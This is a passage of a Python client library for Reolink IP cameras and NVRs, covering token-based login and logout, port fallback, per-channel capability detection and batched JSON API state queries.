f\"https://{self._host}:{self._port}/cgi-bin/api.cgi\"\n else:\n self._url = f\"http://{self._host}:{self._port}/cgi-bin/api.cgi\"\n\n async def login(self) -> None:\n if self._port is None or self._use_https is None:\n await self._login_try_ports()\n return # succes\n\n if self._token is not None and self._lease_time is not None and self._lease_time > (datetime.now() + timedelta(seconds=300)):\n return # succes\n\n await self._login_mutex.acquire()\n try:\n if self._token is not None and self._lease_time is not None and self._lease_time > (datetime.now() + timedelta(seconds=300)):\n _LOGGER.debug(\n \"Host %s:%s, after login mutex aquired, login already completed by another coroutine\",\n self._host,\n self._port,\n )\n return # succes, in case multiple async coroutine are waiting on login_mutex.acquire\n\n await self.logout(login_mutex_owned=True) # Ensure there would be no \"max session\" error\n\n _LOGGER.debug(\n \"Host %s:%s, trying to login with user %s...\",\n self._host,\n self._port,\n self._username,\n )\n\n body: typings.reolink_json = [\n {\n \"cmd\": \"Login\",\n \"action\": 0,\n \"param\": {\n \"User\": {\n \"userName\": self._username,\n \"password\": self._password,\n }\n },\n }\n ]\n param = {\"cmd\": \"Login\"}\n\n try:\n json_data = await self.send(body, param, expected_response_type=\"json\")\n except ApiError as err:\n raise LoginError(f\"API error during login of host {self._host}:{self._port}: {str(err)}\") from err\n except ReolinkConnectionError as err:\n raise LoginError(f\"Client connector error during login of host {self._host}:{self._port}: 
{str(err)}\") from err\n except InvalidContentTypeError as err:\n raise LoginError(f\"Invalid content error during login of host {self._host}:{self._port}: {str(err)}\") from err\n except NoDataError as err:\n raise LoginError(f\"Error receiving Reolink login response of host {self._host}:{self._port}\") from err\n\n _LOGGER.debug(\"Got login response from %s:%s: %s\", self._host, self._port, json_data)\n\n try:\n if json_data[0][\"code\"] != 0:\n raise LoginError(f\"API returned error code {json_data[0]['code']} during login of host {self._host}:{self._port}\")\n\n self._lease_time = datetime.now() + timedelta(seconds=float(json_data[0][\"value\"][\"Token\"][\"leaseTime\"]))\n self._token = str(json_data[0][\"value\"][\"Token\"][\"name\"])\n except Exception as err:\n self.clear_token()\n raise LoginError(f\"Login error, unknown response format from host {self._host}:{self._port}: {json_data}\") from err\n\n _LOGGER.debug(\n \"Logged in at host %s:%s. Leasetime %s, token %s\",\n self._host,\n self._port,\n self._lease_time.strftime(\"%d-%m-%Y %H:%M\"),\n self._token,\n )\n # Looks like some devices fail with not-logged-in if subsequent command sent with no delay, not sure 100% though...\n # I've seen RLC-520A failed with 0.5s, but did not try to set more. Need to gather some more logging data from users...\n # asyncio.sleep(0.5)\n return # succes\n finally:\n self._login_mutex.release()\n\n async def _login_try_ports(self) -> None:\n self._port = 443\n self.enable_https(True)\n try:\n await self.login()\n return\n except LoginError:\n pass\n\n self._port = 80\n self.enable_https(False)\n await self.login()\n\n async def logout(self, login_mutex_owned=False):\n body = [{\"cmd\": \"Logout\", \"action\": 0, \"param\": {}}]\n\n if not login_mutex_owned:\n await self._login_mutex.acquire()\n\n try:\n if self._token:\n param = {\"cmd\": \"Logout\"}\n try:\n # logout sometimes responds with a string of seemingly random caracters, which are always the same for a given camera.\n await self.send(body, param, expected_response_type=\"text/html\")\n except ReolinkError as err:\n _LOGGER.warning(\"Error while logging out: %s\", str(err))\n # Reolink has a bug in some cameras' firmware: the Logout command issued without a token breaks the subsequent commands:\n # even if Login command issued AFTER that successfully returns a token, any command with that token would return \"Please login first\" error.\n # Thus it is not available for now to exit the previous \"stuck\" sessions after sudden crash or power failure:\n # Reolink has restricted amount of sessions on a device, so in such case the component would not be able to login\n # into a device before some previos session expires an hour later...\n # If Reolink fixes this and makes Logout work with login/pass pair instead of a token - this can be uncommented...\n # else:\n # body = [{\"cmd\": \"Logout\", \"action\": 0, \"param\": {\"User\": {\"userName\": self._username, \"password\": self._password}}}]\n # param = {\"cmd\": \"Logout\"}\n # await self.send(body, param, expected_response_type = \"text/html\")\n\n self.clear_token()\n if not login_mutex_owned:\n await self._aiohttp_session.close()\n finally:\n if not login_mutex_owned:\n self._login_mutex.release()\n\n async def expire_session(self, unsubscribe: bool = True):\n if self._lease_time is not None:\n self._lease_time = datetime.now() - timedelta(seconds=5)\n if unsubscribe:\n await self.unsubscribe()\n await self._aiohttp_session.close()\n\n def clear_token(self):\n self._token = None\n 
self._lease_time = None\n\n def construct_capabilities(self, warnings=True) -> None:\n \"\"\"Construct the capabilities list of the NVR/camera.\"\"\"\n # Host capabilities\n self._capabilities[\"Host\"] = []\n\n if self.api_version(\"onvif\") > 0 and self._onvif_port is not None:\n self._capabilities[\"Host\"].append(\"ONVIF\")\n if self.api_version(\"rtsp\") > 0 and self._rtsp_port is not None:\n self._capabilities[\"Host\"].append(\"RTSP\")\n if self.api_version(\"rtmp\") > 0 and self._rtmp_port is not None:\n self._capabilities[\"Host\"].append(\"RTMP\")\n\n if self.sw_version_object.date > datetime(year=2021, month=6, day=1):\n # Check if this camera publishes its inital state upon ONVIF subscription\n self._capabilities[\"Host\"].append(\"initial_ONVIF_state\")\n\n if self._ftp_settings:\n self._capabilities[\"Host\"].append(\"ftp\")\n\n if self._push_settings:\n self._capabilities[\"Host\"].append(\"push\")\n\n if self._recording_settings:\n self._capabilities[\"Host\"].append(\"recording\")\n\n if self._email_settings:\n self._capabilities[\"Host\"].append(\"email\")\n\n if self.api_version(\"supportBuzzer\") > 0:\n self._capabilities[\"Host\"].append(\"buzzer\")\n\n if self.api_version(\"upgrade\") >= 2:\n self._capabilities[\"Host\"].append(\"update\")\n\n if self.api_version(\"wifi\") > 0:\n self._capabilities[\"Host\"].append(\"wifi\")\n\n if self.api_version(\"reboot\") > 0:\n self._capabilities[\"Host\"].append(\"reboot\")\n\n # Channel capabilities\n for channel in self._channels:\n self._capabilities[channel] = []\n\n if self.is_nvr and self.api_version(\"supportAutoTrackStream\", channel) > 0:\n self._capabilities[channel].append(\"autotrack_stream\")\n\n if channel in self._motion_detection_states:\n self._capabilities[channel].append(\"motion_detection\")\n\n if channel > 0 and self.model in DUAL_LENS_DUAL_MOTION_MODELS:\n continue\n\n if channel in self._ftp_settings and (self.api_version(\"GetFtp\") < 1 or \"scheduleEnable\" in self._ftp_settings[channel][\"Ftp\"]):\n self._capabilities[channel].append(\"ftp\")\n\n if channel in self._push_settings and (self.api_version(\"GetPush\") < 1 or \"scheduleEnable\" in self._push_settings[channel][\"Push\"]):\n self._capabilities[channel].append(\"push\")\n\n if channel in self._recording_settings and (self.api_version(\"GetRec\") < 1 or \"scheduleEnable\" in self._recording_settings[channel][\"Rec\"]):\n self._capabilities[channel].append(\"recording\")\n\n if channel in self._email_settings and (self.api_version(\"GetEmail\") < 1 or \"scheduleEnable\" in self._email_settings[channel][\"Email\"]):\n self._capabilities[channel].append(\"email\")\n\n if channel in self._buzzer_settings and self.api_version(\"supportBuzzer\") > 0 and \"scheduleEnable\" in self._buzzer_settings[channel][\"Buzzer\"]:\n self._capabilities[channel].append(\"buzzer\")\n\n if self.api_version(\"ledControl\", channel) > 0 and channel in self._ir_settings:\n self._capabilities[channel].append(\"ir_lights\")\n\n if self.api_version(\"powerLed\", channel) > 0:\n # powerLed == statusLed = doorbell_led\n self._capabilities[channel].append(\"status_led\") # internal use only\n self._capabilities[channel].append(\"power_led\")\n if self.api_version(\"supportDoorbellLight\", channel) > 0 or self.is_doorbell(channel):\n # powerLed == statusLed = doorbell_led\n self._capabilities[channel].append(\"status_led\") # internal use only\n self._capabilities[channel].append(\"doorbell_led\")\n\n if self.api_version(\"GetWhiteLed\") > 0 and (\n 
self.api_version(\"floodLight\", channel) > 0 or self.api_version(\"supportFLswitch\", channel) > 0 or self.api_version(\"supportFLBrightness\", channel) > 0\n ):\n # floodlight == spotlight == WhiteLed\n self._capabilities[channel].append(\"floodLight\")\n\n if self.api_version(\"GetAudioCfg\") > 0:\n self._capabilities[channel].append(\"volume\")\n if self.api_version(\"supportVisitorLoudspeaker\", channel) > 0:\n self._capabilities[channel].append(\"doorbell_button_sound\")\n\n if (self.api_version(\"supportAudioFileList\", channel) > 0 and self.api_version(\"supportAutoReply\", channel) > 0) or (\n not self.is_nvr and self.api_version(\"supportAudioFileList\") > 0 and self.api_version(\"supportAutoReply\") > 0\n ):\n self._capabilities[channel].append(\"quick_reply\")\n\n if self.api_version(\"alarmAudio\", channel) > 0 and channel in self._audio_alarm_settings:\n self._capabilities[channel].append(\"siren\")\n self._capabilities[channel].append(\"siren_play\") # if self.api_version(\"supportAoAdjust\", channel) > 0\n\n if self.audio_record(channel) is not None:\n self._capabilities[channel].append(\"audio\")\n\n ptz_ver = self.api_version(\"ptzType\", channel)\n if ptz_ver != 0:\n self._capabilities[channel].append(\"ptz\")\n if ptz_ver in [1, 2, 5]:\n self._capabilities[channel].append(\"zoom_basic\")\n min_zoom = self._zoom_focus_range.get(channel, {}).get(\"zoom\", {}).get(\"pos\", {}).get(\"min\")\n max_zoom = self._zoom_focus_range.get(channel, {}).get(\"zoom\", {}).get(\"pos\", {}).get(\"max\")\n if min_zoom is None or max_zoom is None:\n if warnings:\n _LOGGER.warning(\"Camera %s reported to support zoom, but zoom range not available\", self.camera_name(channel))\n else:\n self._capabilities[channel].append(\"zoom\")\n self._capabilities[channel].append(\"focus\")\n if self.api_version(\"disableAutoFocus\", channel) > 0:\n self._capabilities[channel].append(\"auto_focus\")\n if ptz_ver in [2, 3, 5]:\n self._capabilities[channel].append(\"tilt\")\n if ptz_ver in [2, 3, 5, 7]:\n self._capabilities[channel].append(\"pan_tilt\")\n self._capabilities[channel].append(\"pan\")\n if self.api_version(\"supportPtzCalibration\", channel) > 0 or self.api_version(\"supportPtzCheck\", channel) > 0:\n self._capabilities[channel].append(\"ptz_callibrate\")\n if self.api_version(\"GetPtzGuard\", channel) > 0:\n self._capabilities[channel].append(\"ptz_guard\")\n if self.api_version(\"GetPtzCurPos\", channel) > 0:\n self._capabilities[channel].append(\"ptz_position\")\n if ptz_ver in [2, 3]:\n self._capabilities[channel].append(\"ptz_speed\")\n if channel in self._ptz_presets and len(self._ptz_presets[channel]) != 0:\n self._capabilities[channel].append(\"ptz_presets\")\n\n if self.api_version(\"supportDigitalZoom\", channel) > 0 and \"zoom\" not in self._capabilities[channel]:\n self._capabilities[channel].append(\"zoom_basic\")\n min_zoom = self._zoom_focus_range.get(channel, {}).get(\"zoom\", {}).get(\"pos\", {}).get(\"min\")\n max_zoom = self._zoom_focus_range.get(channel, {}).get(\"zoom\", {}).get(\"pos\", {}).get(\"max\")\n if min_zoom is not None and max_zoom is not None:\n self._capabilities[channel].append(\"zoom\")\n else:\n if warnings:\n _LOGGER.warning(\"Camera %s reported to support zoom, but zoom range not available\", self.camera_name(channel))\n\n if self.api_version(\"aiTrack\", channel) > 0:\n self._capabilities[channel].append(\"auto_track\")\n track_method = self._auto_track_range.get(channel, {}).get(\"aiTrack\", False)\n if isinstance(track_method, list):\n if 
len(track_method) > 1 and sorted(track_method) != [0, 1]:\n self._capabilities[channel].append(\"auto_track_method\")\n if self.auto_track_disappear_time(channel) > 0:\n self._capabilities[channel].append(\"auto_track_disappear_time\")\n if self.auto_track_stop_time(channel) > 0:\n self._capabilities[channel].append(\"auto_track_stop_time\")\n\n if self.api_version(\"supportAITrackLimit\", channel) > 0:\n self._capabilities[channel].append(\"auto_track_limit\")\n\n if channel in self._md_alarm_settings:\n self._capabilities[channel].append(\"md_sensitivity\")\n\n if self.api_version(\"supportAiSensitivity\", channel) > 0:\n self._capabilities[channel].append(\"ai_sensitivity\")\n\n if self.api_version(\"supportAiStayTime\", channel) > 0:\n self._capabilities[channel].append(\"ai_delay\")\n\n if self.api_version(\"ispHue\", channel) > 0:\n self._capabilities[channel].append(\"isp_hue\")\n if self.api_version(\"ispSatruation\", channel) > 0:\n self._capabilities[channel].append(\"isp_satruation\")\n if self.api_version(\"ispSharpen\", channel) > 0:\n self._capabilities[channel].append(\"isp_sharpen\")\n if self.api_version(\"ispContrast\", channel) > 0:\n self._capabilities[channel].append(\"isp_contrast\")\n if self.api_version(\"ispBright\", channel) > 0:\n self._capabilities[channel].append(\"isp_bright\")\n\n if self.api_version(\"ispDayNight\", channel, no_key_return=1) > 0 and self.daynight_state(channel) is not None:\n self._capabilities[channel].append(\"dayNight\")\n\n if self.backlight_state(channel) is not None:\n self._capabilities[channel].append(\"backLight\")\n\n def supported(self, channel: int | None, capability: str) -> bool:\n \"\"\"Return if a capability is supported by a camera channel.\"\"\"\n if channel is None:\n return capability in self._capabilities[\"Host\"]\n\n if channel not in self._capabilities:\n return False\n\n return capability in self._capabilities[channel]\n\n def api_version(self, capability: str, channel: int | None = None, no_key_return: int = 0) -> int:\n \"\"\"Return the api version of a capability, 0=not supported, >0 is supported\"\"\"\n if capability in self._api_version:\n return self._api_version[capability]\n\n if channel is None:\n return self._abilities.get(capability, {}).get(\"ver\", 0)\n\n if channel >= len(self._abilities[\"abilityChn\"]):\n return 0\n\n return self._abilities[\"abilityChn\"][channel].get(capability, {}).get(\"ver\", no_key_return)\n\n async def get_state(self, cmd: str) -> None:\n body = []\n channels = []\n for channel in self._stream_channels:\n ch_body = []\n if cmd == \"GetEnc\":\n ch_body = [{\"cmd\": \"GetEnc\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetRtspUrl\":\n ch_body = [{\"cmd\": \"GetRtspUrl\", \"action\": 0, \"param\": {\"channel\": channel}}]\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n\n for channel in self._channels:\n ch_body = []\n if cmd == \"GetIsp\":\n ch_body = [{\"cmd\": \"GetIsp\", \"action\": 0, \"param\": {\"channel\": channel}}]\n\n if channel > 0 and self.model in DUAL_LENS_DUAL_MOTION_MODELS:\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n continue\n\n if cmd == \"GetIrLights\":\n ch_body = [{\"cmd\": \"GetIrLights\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetPowerLed\":\n ch_body = [{\"cmd\": \"GetPowerLed\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetWhiteLed\":\n ch_body = [{\"cmd\": \"GetWhiteLed\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd 
== \"GetPtzPreset\":\n ch_body = [{\"cmd\": \"GetPtzPreset\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetAutoFocus\":\n ch_body = [{\"cmd\": \"GetAutoFocus\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetZoomFocus\":\n ch_body = [{\"cmd\": \"GetZoomFocus\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetPtzGuard\":\n ch_body = [{\"cmd\": \"GetPtzGuard\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetPtzCurPos\":\n ch_body = [{\"cmd\": \"GetPtzCurPos\", \"action\": 0, \"param\": {\"PtzCurPos\": {\"channel\": channel}}}]\n elif cmd == \"GetAiCfg\":\n ch_body = [{\"cmd\": \"GetAiCfg\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetPtzTraceSection\":\n ch_body = [{\"cmd\": \"GetPtzTraceSection\", \"action\": 0, \"param\": {\"PtzTraceSection\": {\"channel\": channel}}}]\n elif cmd == \"GetAudioCfg\":\n ch_body = [{\"cmd\": \"GetAudioCfg\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetAudioFileList\":\n ch_body = [{\"cmd\": \"GetAudioFileList\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetAutoReply\":\n ch_body = [{\"cmd\": \"GetAutoReply\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetOsd\":\n ch_body = [{\"cmd\": \"GetOsd\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetBuzzerAlarmV20\":\n ch_body = [{\"cmd\": \"GetBuzzerAlarmV20\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd in [\"GetAlarm\", \"GetMdAlarm\"]:\n if self.api_version(\"GetMdAlarm\") >= 1:\n ch_body = [{\"cmd\": \"GetMdAlarm\", \"action\": 0, \"param\": {\"channel\": channel}}]\n else:\n ch_body = [{\"cmd\": \"GetAlarm\", \"action\": 0, \"param\": {\"Alarm\": {\"channel\": channel, \"type\": \"md\"}}}]\n elif cmd == \"GetAiAlarm\":\n ch_body = []\n for ai_type in self.ai_supported_types(channel):\n ch_body.append({\"cmd\": \"GetAiAlarm\", \"action\": 0, \"param\": {\"channel\": channel, \"ai_type\": ai_type}})\n elif cmd in [\"GetEmail\", \"GetEmailV20\"]:\n if self.api_version(\"GetEmail\") >= 1:\n ch_body = [{\"cmd\": \"GetEmailV20\", \"action\": 0, \"param\": {\"channel\": channel}}]\n else:\n ch_body = [{\"cmd\": \"GetEmail\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd in [\"GetPush\", \"GetPushV20\"]:\n if self.api_version(\"GetPush\") >= 1:\n ch_body = [{\"cmd\": \"GetPushV20\", \"action\": 0, \"param\": {\"channel\": channel}}]\n else:\n ch_body = [{\"cmd\": \"GetPush\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd in [\"GetFtp\", \"GetFtpV20\"]:\n if self.api_version(\"GetFtp\") >= 1:\n ch_body = [{\"cmd\": \"GetFtpV20\", \"action\": 0, \"param\": {\"channel\": channel}}]\n else:\n ch_body = [{\"cmd\": \"GetFtp\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd in [\"GetRec\", \"GetRecV20\"]:\n if self.api_version(\"GetRec\") >= 1:\n ch_body = [{\"cmd\": \"GetRecV20\", \"action\": 0, \"param\": {\"channel\": channel}}]\n else:\n ch_body = [{\"cmd\": \"GetRec\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd in [\"GetAudioAlarm\", \"GetAudioAlarmV20\"]:\n if self.api_version(\"GetAudioAlarm\") >= 1:\n ch_body = [{\"cmd\": \"GetAudioAlarmV20\", \"action\": 0, \"param\": {\"channel\": channel}}]\n else:\n ch_body = [{\"cmd\": \"GetAudioAlarm\", \"action\": 0, \"param\": {\"channel\": channel}}]\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n\n if not channels:\n if cmd == \"Getchannelstatus\":\n body = 
[{\"cmd\": \"Getchannelstatus\"}]\n elif cmd == \"GetDevInfo\":\n body = [{\"cmd\": \"GetDevInfo\", \"action\": 0, \"param\": {}}]\n elif cmd == \"GetLocalLink\":\n body = [{\"cmd\": \"GetLocalLink\", \"action\": 0, \"param\": {}}]\n elif cmd == \"GetWifiSignal\":\n body = [{\"cmd\": \"GetWifiSignal\", \"action\": 0, \"param\": {}}]\n elif cmd == \"GetNetPort\":\n body = [{\"cmd\": \"GetNetPort\", \"action\": 0, \"param\": {}}]\n elif cmd == \"GetHddInfo\":\n body = [{\"cmd\": \"GetHddInfo\", \"action\": 0, \"param\": {}}]\n elif cmd == \"GetUser\":\n body = [{\"cmd\": \"GetUser\", \"action\": 0, \"param\": {}}]\n elif cmd == \"GetNtp\":\n body = [{\"cmd\": \"GetNtp\", \"action\": 0, \"param\": {}}]\n elif cmd == \"GetTime\":\n body = [{\"cmd\": \"GetTime\", \"action\": 0, \"param\": {}}]\n elif cmd == \"GetAbility\":\n body = [{\"cmd\": \"GetAbility\", \"action\": 0, \"param\": {\"User\": {\"userName\": self._username}}}]\n\n if body:\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError as err:\n raise InvalidContentTypeError(f\"get_state cmd '{body[0]['cmd']}': {str(err)}\") from err\n except NoDataError as err:\n raise NoDataError(f\"Host: {self._host}:{self._port}: error obtaining get_state response for cmd '{body[0]['cmd']}'\") from err\n\n if channels:\n self.map_channels_json_response(json_data, channels)\n else:\n self.map_host_json_response(json_data)\n\n return\n\n async def get_states(self) -> None:\n body = []\n channels = []\n for channel in self._stream_channels:\n ch_body = [{\"cmd\": \"GetEnc\", \"action\": 0, \"param\": {\"channel\": channel}}]\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n\n for channel in self._channels:\n ch_body = [{\"cmd\": \"GetIsp\", \"action\": 0, \"param\": {\"channel\": channel}}]\n if self.api_version(\"GetEvents\") >= 1:\n ch_body.append({\"cmd\": \"GetEvents\", \"action\": 0, \"param\": {\"channel\": channel}})\n else:\n ch_body.append({\"cmd\": \"GetMdState\", \"action\": 0, \"param\": {\"channel\": channel}})\n if self.ai_supported(channel):\n ch_body.append({\"cmd\": \"GetAiState\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"ir_lights\"):\n ch_body.append({\"cmd\": \"GetIrLights\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"floodLight\"):\n ch_body.append({\"cmd\": \"GetWhiteLed\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"status_led\"):\n ch_body.append({\"cmd\": \"GetPowerLed\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"zoom\"):\n ch_body.append({\"cmd\": \"GetZoomFocus\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"auto_focus\"):\n ch_body.append({\"cmd\": \"GetAutoFocus\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"ptz_guard\"):\n ch_body.append({\"cmd\": \"GetPtzGuard\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"ptz_position\"):\n ch_body.append({\"cmd\": \"GetPtzCurPos\", \"action\": 0, \"param\": {\"PtzCurPos\": {\"channel\": channel}}})\n\n if self.supported(channel, \"auto_track\"):\n ch_body.append({\"cmd\": \"GetAiCfg\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"auto_track_limit\"):\n ch_body.append({\"cmd\": \"GetPtzTraceSection\", \"action\": 0, \"param\": {\"PtzTraceSection\": {\"channel\": channel}}})\n\n if 
self.supported(channel, \"volume\"):\n ch_body.append({\"cmd\": \"GetAudioCfg\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"quick_reply\"):\n ch_body.append({\"cmd\": \"GetAutoReply\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"buzzer\"):\n ch_body.append({\"cmd\": \"GetBuzzerAlarmV20\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"email\"):\n if self.api_version(\"GetEmail\") >= 1:\n ch_body.append({\"cmd\": \"GetEmailV20\", \"action\": 0, \"param\": {\"channel\": channel}})\n else:\n ch_body.append({\"cmd\": \"GetEmail\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"push\"):\n if self.api_version(\"GetPush\") >= 1:\n ch_body.append({\"cmd\": \"GetPushV20\", \"action\": 0, \"param\": {\"channel\": channel}})\n else:\n ch_body.append({\"cmd\": \"GetPush\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"ftp\"):\n if self.api_version(\"GetFtp\") >= 1:\n ch_body.append({\"cmd\": \"GetFtpV20\", \"action\": 0, \"param\": {\"channel\": channel}})\n else:\n ch_body.append({\"cmd\": \"GetFtp\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"recording\"):\n if self.api_version(\"GetRec\") >= 1:\n ch_body.append({\"cmd\": \"GetRecV20\", \"action\": 0, \"param\": {\"channel\": channel}})\n else:\n ch_body.append({\"cmd\": \"GetRec\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"siren\"):\n if self.api_version(\"GetAudioAlarm\") >= 1:\n ch_body.append({\"cmd\": \"GetAudioAlarmV20\", \"action\": 0, \"param\": {\"channel\": channel}})\n else:\n ch_body.append({\"cmd\": \"GetAudioAlarm\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"md_sensitivity\"):\n if self.api_version(\"GetMdAlarm\") >= 1:\n ch_body.append({\"cmd\": \"GetMdAlarm\", \"action\": 0, \"param\": {\"channel\": channel}})\n else:\n ch_body.append({\"cmd\": \"GetAlarm\", \"action\": 0, \"param\": {\"Alarm\": {\"channel\": channel, \"type\": \"md\"}}})\n\n if self.supported(channel, \"ai_sensitivity\"):\n for ai_type in self.ai_supported_types(channel):\n ch_body.append({\"cmd\": \"GetAiAlarm\", \"action\": 0, \"param\": {\"channel\": channel, \"ai_type\": ai_type}})\n\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n\n # host states\n host_body = []\n if self.supported(None, \"wifi\") and self.wifi_connection:\n host_body.append({\"cmd\": \"GetWifiSignal\", \"action\": 0, \"param\": {}})\n\n body.extend(host_body)\n channels.extend([-1] * len(host_body))\n\n if not body:\n _LOGGER.debug(\n \"Host %s:%s: get_states, no channels connected so skipping request.\",\n self._host,\n self._port,\n )\n return\n\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError as err:\n raise InvalidContentTypeError(f\"channel-state: {str(err)}\") from err\n except NoDataError as err:\n raise NoDataError(f\"Host: {self._host}:{self._port}: error obtaining channel-state response\") from err\n\n self.map_channels_json_response(json_data, channels)\n\n async def get_host_data(self) -> None:\n \"\"\"Fetch the host settings/capabilities.\"\"\"\n body: typings.reolink_json = [\n {\"cmd\": \"Getchannelstatus\"},\n {\"cmd\": \"GetDevInfo\", \"action\": 0, \"param\": {}},\n {\"cmd\": \"GetLocalLink\", \"action\": 0, \"param\": {}},\n {\"cmd\": \"GetNetPort\", \"action\": 0, \"param\": {}},\n 
{\"cmd\": \"GetHddInfo\", \"action\": 0, \"param\": {}},\n {\"cmd\": \"GetUser\", \"action\": 0, \"param\": {}},\n {\"cmd\": \"GetNtp\", \"action\": 0, \"param\": {}},\n {\"cmd\": \"GetTime\", \"action\": 0, \"param\": {}},\n {\"cmd\": \"GetAbility\", \"action\": 0, \"param\": {\"User\": {\"userName\": self._username}}},\n ]\n\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError as err:\n raise InvalidContentTypeError(f\"Get host-settings error: {str(err)}\") from err\n except NoDataError as err:\n raise NoDataError(f\"Host: {self._host}:{self._port}: returned no data when obtaining host-settings\") from err\n\n self.map_host_json_response(json_data)\n self.construct_capabilities(warnings=False)\n\n if self.model in DUAL_LENS_SINGLE_MOTION_MODELS or (not self.is_nvr and self.api_version(\"supportAutoTrackStream\", 0) > 0):\n self._stream_channels = [0, 1]\n self._nvr_num_channels = 1\n self._channels = [0]\n else:\n self._stream_channels = self._channels\n\n body = []\n channels = []\n for channel in self._stream_channels:\n ch_body = [\n {\"cmd\": \"GetEnc\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetRtspUrl\", \"action\": 0, \"param\": {\"channel\": channel}},\n ]\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n\n for channel in self._channels:\n ch_body = [\n {\"cmd\": \"GetChnTypeInfo\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetMdState\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetAiState\", \"action\": 0, \"param\": {\"channel\": channel}}, # to capture AI capabilities\n {\"cmd\": \"GetEvents\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetIsp\", \"action\": 0, \"param\": {\"channel\": channel}},\n ]\n\n if channel > 0 and self.model in DUAL_LENS_DUAL_MOTION_MODELS:\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n continue\n\n ch_body.extend(\n [\n {\"cmd\": \"GetWhiteLed\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetIrLights\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetAudioCfg\", \"action\": 0, \"param\": {\"channel\": channel}},\n ]\n )\n # one time values\n ch_body.append({\"cmd\": \"GetOsd\", \"action\": 0, \"param\": {\"channel\": channel}})\n if self.supported(channel, \"quick_reply\"):\n ch_body.append({\"cmd\": \"GetAudioFileList\", \"action\": 0, \"param\": {\"channel\": channel}})\n # checking range\n if self.supported(channel, \"zoom_basic\"):\n ch_body.append({\"cmd\": \"GetZoomFocus\", \"action\": 1, \"param\": {\"channel\": channel}})\n if self.supported(channel, \"pan_tilt\") and self.api_version(\"ptzPreset\", channel) >= 1:\n ch_body.append({\"cmd\": \"GetPtzPreset\", \"action\": 0, \"param\": {\"channel\": channel}})\n ch_body.append({\"cmd\": \"GetPtzGuard\", \"action\": 0, \"param\": {\"channel\": channel}})\n ch_body.append({\"cmd\": \"GetPtzCurPos\", \"action\": 0, \"param\": {\"PtzCurPos\": {\"channel\": channel}}})\n if self.supported(channel, \"auto_track\"):\n ch_body.append({\"cmd\": \"GetAiCfg\", \"action\": 1, \"param\": {\"channel\": channel}})\n # checking API versions\n if self.api_version(\"supportBuzzer\") > 0:\n ch_body.append({\"cmd\": \"GetBuzzerAlarmV20\", \"action\": 0, \"param\": {\"channel\": channel}})\n if self.api_version(\"scheduleVersion\") >= 1:\n ch_body.extend(\n [\n {\"cmd\": \"GetEmailV20\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetPushV20\", \"action\": 0, 
